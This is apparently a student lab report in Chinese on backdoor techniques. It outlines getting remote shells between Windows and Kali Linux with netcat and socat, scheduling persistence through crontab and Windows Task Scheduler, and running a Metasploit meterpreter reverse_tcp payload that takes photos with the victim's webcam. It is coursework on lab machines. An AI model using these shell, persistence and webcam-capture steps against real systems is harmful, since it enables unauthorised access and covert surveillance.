20155234 Exp2 后门原理与实践

Windows获得Linux Shell

1.查看ip

2.监听端口

3.实验成功如下图

Linux获得Win Shell

1.查看虚拟机ip

2.监听端口

3.实验成功如下图

使用NC传输数据

1.用crontab -e指令编辑一条定时任务

输入3，选vim.basic

2.成功

使用socat获取主机操作Shell, 任务计划启动

在Windows系统下，打开控制面板->管理工具->任务计划程序，创建任务，填写任务名称后，新建一个触发器
在Kali环境下输入指令socat - tcp:192.168.1.111:5234，这里的第一个参数-代表标准的输入输出，第二个流连接到Windows主机的5234端口，此时可以发现已经成功获得了一个cmd shell

使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1.在Kali上使用msfconsole指令进入msf控制台，set payload windows/meterpreter/reverse_tcp，使用监听模块，设置payload，设置反弹回连的IP和端口

2.利用exploit，执行监听，在windows中，利用20155210.exe运行20155210.exe

3.使用webcam_snap指令可以使用摄像头进行拍照